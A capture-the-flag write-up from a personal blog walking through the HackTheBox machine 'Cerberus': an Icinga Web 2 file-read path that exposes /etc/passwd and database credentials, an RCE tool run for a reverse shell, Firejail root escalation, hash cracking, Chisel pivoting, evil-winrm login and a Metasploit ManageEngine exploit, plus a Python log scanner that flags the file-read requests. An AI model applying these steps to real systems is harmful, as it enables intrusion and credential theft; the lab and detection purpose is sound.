HackTheBox : Cerberus

#$ubh@nk@r
Jul 27, 2023

Intro : This is a really hard machine on HackTheBox. It took me 4 days to solve, though the concept is easy. At first you get shell access with an Icinga Web 2 exploit, then you have to use Firejail to get root. After that you also have to use pivoting to hack the main Windows box, then using a ManageEngine exploit you will get Admin access. So let’s start.

Nmap Scan :

As usual I started with a simple Nmap scan and saw that only one port is open: 8080 (http).

Tip : nmap -sVC -Pn -T4 <ip> -vv

This reveals a domain name, so I added it to my hosts file.

Web Enumeration :

Then I simply visited the website and saw an Icinga login page.

I didn’t know any username or password, so I searched Google for any exploit available for ‘Icinga Web 2’. And I found this one Here.

It says that using the path lib/icinga/icinga-php-thirdparty we can read arbitrary files on the machine. So I tried it.

First I tried ‘/etc/passwd’, and I got it.

Then I checked Google for the Icinga Web 2 config files, and I got this below.

The Path will be → /etc/icingaweb2/<file>

Then I tried them one by one. In the ‘resources.ini’ file I got the database user and password.

Then I used those credentials to log in and I got the Dashboard page.
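The file reads in this section leave a distinctive trace in the web server's access log. As an added example (not part of the original write-up), the Python below flags requests on the lib/icinga/icinga-php-thirdparty route that resolve to system paths or to files that are not front-end assets. The /icingaweb2 base path, the combined log format, the asset-extension allowlist and the sample log lines are assumptions constructed for illustration.

```python
import re
from pathlib import PurePosixPath
from urllib.parse import unquote, urlsplit

# Route the write-up names as the arbitrary-file-read vector.
LIB_ROUTE = "lib/icinga/icinga-php-thirdparty/"
# Assumption: legitimate requests on this route only fetch front-end assets.
ASSET_EXT = {".js", ".css", ".map", ".png", ".svg", ".gif", ".woff", ".woff2"}
# Top-level system directories that never belong to a library asset tree.
SYSTEM_ROOTS = {"etc", "proc", "var", "home", "root", "usr", "sys"}
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3}) ')


def classify(line):
    """Return (client, file_path, verdict) for a suspicious request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, target, status = m.groups()
    path = urlsplit(target).path
    for _ in range(2):  # undo single and double percent-encoding
        path = unquote(path)
    _, found, rest = path.partition(LIB_ROUTE)
    rest = rest.lstrip("/")
    if not found or not rest:
        return None
    tail = PurePosixPath(rest)
    suspicious = (".." in tail.parts or tail.suffix.lower() not in ASSET_EXT
                  or bool(SYSTEM_ROOTS.intersection(tail.parts[:1])))
    if not suspicious:
        return None
    verdict = "file-read-succeeded" if status == "200" else "file-read-attempt"
    return client, "/" + rest, verdict


def scan(lines):
    return [hit for hit in map(classify, lines) if hit]


# Constructed sample log; client addresses are from documentation ranges.
SAMPLE_LOG = [
    '198.51.100.7 - - [27/Jul/2023:10:00:01 +0000] "GET /icingaweb2/lib/icinga/icinga-php-thirdparty/asset/js/app.js HTTP/1.1" 200 5120',
    '198.51.100.23 - - [27/Jul/2023:10:02:11 +0000] "GET /icingaweb2/lib/icinga/icinga-php-thirdparty/etc/passwd HTTP/1.1" 200 1843',
    '198.51.100.23 - - [27/Jul/2023:10:03:40 +0000] "GET /icingaweb2/lib/icinga/icinga-php-thirdparty/etc/icingaweb2/resources.ini HTTP/1.1" 200 312',
    '198.51.100.23 - - [27/Jul/2023:10:04:02 +0000] "GET /icingaweb2/lib/icinga/icinga-php-thirdparty/etc%2Fshadow HTTP/1.1" 404 0',
    '198.51.100.7 - - [27/Jul/2023:10:05:00 +0000] "GET /icingaweb2/authentication/login HTTP/1.1" 200 2048',
]
```

A 200 response on a path such as /etc/icingaweb2/resources.ini means the credentials stored there should be treated as exposed and rotated.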

Web Exploitation :

Since I had the Dashboard page, I searched Google for any RCE exploit for Icinga Web 2 that gives a reverse shell as any user. And I found this one working properly.

So I tried it. But to use it you have to make a ‘pem’ file in your VM.

I named it ssh.

So now let’s Test the Exploit.

Tip : python3 <name.py> -t <URL> -I <tun0_ip> -P <port> -u <name> -p <pass> -e <pem_file_name> (in my case it is ssh)

And in my Netcat listener I got a reverse shell as www-data.

Then I upgraded my shell (try it yourself).

Root Access :

After that I ran ‘linpeas.sh’ on the victim’s machine to escalate privileges.

And I found the ‘Firejail’ binary present there.

So I searched for it and got an exploit code Here. I copied and saved it in my VM and sent it to the victim’s machine. Then I ran it.

I am familiar with Firejail as it was present in the previous HackTheBox machine that I solved.

Then you have to join this session number above in another Terminal. And then you have to type ‘su -’.

And game finished: we get root access.

But the trick is we haven’t hacked any Windows machine, so we don’t get any user or root flag. So this is the time we have to go into the Windows machine.

User as Matthew :

Below I found some ldb files. Maybe here I can find something with which I can get a shell on the Windows machine.

I used the strings command on the 1st file and I got a user password hash. Ha! Ha!

Then I cracked it using John. I have already cracked it.

Tip : john --wordlist=<path_to_rockyou> <hash_file>

But how can I connect to Windows? So I checked the ‘/etc/hosts’ file to find some clue, and I found an internal IP with a domain name. Maybe it is the Windows IP. So we have to use a pivoting method to access that IP address.

Tip : 172.16.22.1 DC.cerberus.local DC cerberus.local

Here I used ‘Chisel’, an awesome tool for pivoting. You will get it from Here.

To use it you have to run it in server and client mode: server in your VM and client in the victim’s VM.

Tip : ./chisel server -p 8000 --reverse

I transferred the Chisel binary to the victim’s machine also.

Now you can access that IP address. I used ‘evil-winrm’ to get access to the Windows machine.

Tip : evil-winrm -i <tun0_ip> -u matthew -p <pass_we_got>

Note : Here we use tun0_ip because we use this IP for Pivoting.

Administrator Access :

It’s time for some PrivEsc. So I ran the winpeas.exe file and found that a ManageEngine service is present there. Here it is.

I searched for any exploit in Google and I found this Here.

I found an exploit in Metasploit-Framework but it wants a GUID for exploitation. So I searched for any ports running on the Windows box.

There are a lot. So I thought I would forward some of the ports using port forwarding. Maybe there is something interesting.

So I again started my Chisel server in my VM.

Note : You have to download a Windows-based Chisel to run it on Windows, otherwise it will not work. But in your VM you will run the Linux-based Chisel. You will find all the binary files Here.

We will access it with our localhost. As the IP has the domain name DC.cerberus.local, we have to add it to our hosts file to access it.

I forwarded these ports to my VM → 8001, 80, 8888, 9251.

On port 9251 I got a login page like this below.

Tip : localhost:9251 (In Browser)

I used these creds → matthew@cerberus.local : 147258369.

After login the page is not showing anything, but I got the GUID which I want for exploitation. The last part of the URL is the GUID.

Then I started msfconsole and searched for manageengine.

And I used this exploit. The exploit number may be different.

Then you have to set some options as below.

Then I typed exploit and suddenly I got a Meterpreter session as Administrator.

And on the Administrator desktop I got the root flag.

Yaaaaaa!! At last we pwned the machine. I learned really new things from this machine. Thanks to the creator! Meet you in my next blog.

THANKS FOR READING!

If you like it don’t Forget to follow me for More Articles.

Happy Hacking~


Written by #$ubh@nk@r

CyberSecurity Learner, CTF Player, Noob Bug Hunter https://starlox0.github.io/
